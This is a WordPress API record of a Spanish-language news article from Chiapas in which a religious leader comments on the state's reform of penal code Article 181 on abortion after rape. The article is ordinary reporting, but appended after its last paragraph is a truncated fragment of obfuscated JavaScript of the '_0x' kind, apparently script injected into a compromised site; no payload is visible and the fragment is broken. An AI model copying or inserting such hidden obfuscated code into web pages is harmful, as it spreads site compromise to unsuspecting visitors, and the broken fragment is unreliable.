{"id":9909,"date":"2023-05-05T03:55:25","date_gmt":"2023-05-05T03:55:25","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9909"},"modified":"2023-05-05T03:55:26","modified_gmt":"2023-05-05T03:55:26","slug":"religiosos-manifiestan-postura-a-reforma-al-articulo-181-del-codigo-penal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9909","title":{"rendered":"Religiosos manifiestan postura a reforma al Art\u00edculo 181 del C\u00f3digo Penal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1024x576.jpeg\" alt=\"\" class=\"wp-image-9910\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1024x576.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-300x169.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-768x432.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM-1536x864.jpeg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/05\/WhatsApp-Image-2023-05-04-at-3.11.19-PM.jpeg 1599w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/Corresponsal<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- Esdras Alonso Gonz\u00e1lez, l\u00edder de la agrupaci\u00f3n religiosa \u201cAlas de \u00c1guila\u201d manifest\u00f3 su postura sobre la reforma del Art\u00edculo 181 del C\u00f3digo Penal que despenaliza el aborto despu\u00e9s de un periodo superior de tres meses en caso de una violaci\u00f3n,&nbsp; por legisladores del estado, donde opina m\u00e1s sectores debieron ser tomados en cuenta, pese a ser una disposici\u00f3n de la Suprema Corte de Justicia.<\/p>\n\n\n\n<p>En entrevista, dijo que ese tema se trat\u00f3 en el Consejo Interreligioso de Chiapas, donde se aclar\u00f3 que se trat\u00f3 de un caso particular de una menor que fue violada, por lo que la Suprema Corte dispuso hacer esa reforma al Congreso, y reconoci\u00f3 que al menos una diputada se manifest\u00f3 en contra.<\/p>\n\n\n\n<p>\u201cM\u00e1s tarde hicieron alguna aclaraci\u00f3n desde el Congreso, que se trataba de un caso particular de una ni\u00f1a que hab\u00eda sido violada, y la suprema corte se hab\u00eda pronunciado hacia el Gobierno de Chiapas para modificar el Art\u00edculo 181, entonces por esa petici\u00f3n se ten\u00eda que reformar esto para dar certeza a los menores en caso violaciones\u201d.<\/p>\n\n\n\n<p>Celebr\u00f3 que hubieron reacciones en contra, con lo que se demuestra que el movimiento religioso est\u00e1 pendiente de estos temas sensibles, \u201ctambi\u00e9n es bueno que se resuelvan esos casos sensibles, sobre todo cuando hay que promover agendas respetable las instituciones del estado, se debe dar a la prudencia puede haber una mala interpretaci\u00f3n, a choques, reacciones que bueno que lo aclararon\u201d.<\/p>\n\n\n\n<p>\u201cLa situaci\u00f3n es que deben respetarse los derechos, nadie discute las libertades, que el Estado haya hecho esto, en este caso particular es l\u00f3gico, pero es bueno que se haga la observaci\u00f3n, son temas sensibles, la suprema corte de justicia, los partidos pol\u00edticos hacen cosas a espaldas del pueblo, no pueden secuestrar la opini\u00f3n del pueblo, hacia donde vamos, no se dio desde el congreso sino de la Suprema Corte, y hubo una legisladora, Fabiola Ricci que no estuvo de acuerdo\u201d, concluy\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/Corresponsal San Crist\u00f3bal de Las Casas.- Esdras Alonso Gonz\u00e1lez, l\u00edder de la agrupaci\u00f3n religiosa \u201cAlas de \u00c1guila\u201d manifest\u00f3 su postura sobre la reforma del Art\u00edculo 181 del C\u00f3digo Penal que despenaliza el aborto despu\u00e9s de un periodo superior de tres meses en caso de una violaci\u00f3n,&nbsp; por legisladores del estado, donde opina m\u00e1s sectores &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9910,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9909","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9909","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9909"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9909\/revisions"}],"predecessor-version":[{"id":9911,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9909\/revisions\/9911"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9910"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9909"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9909"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9909"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}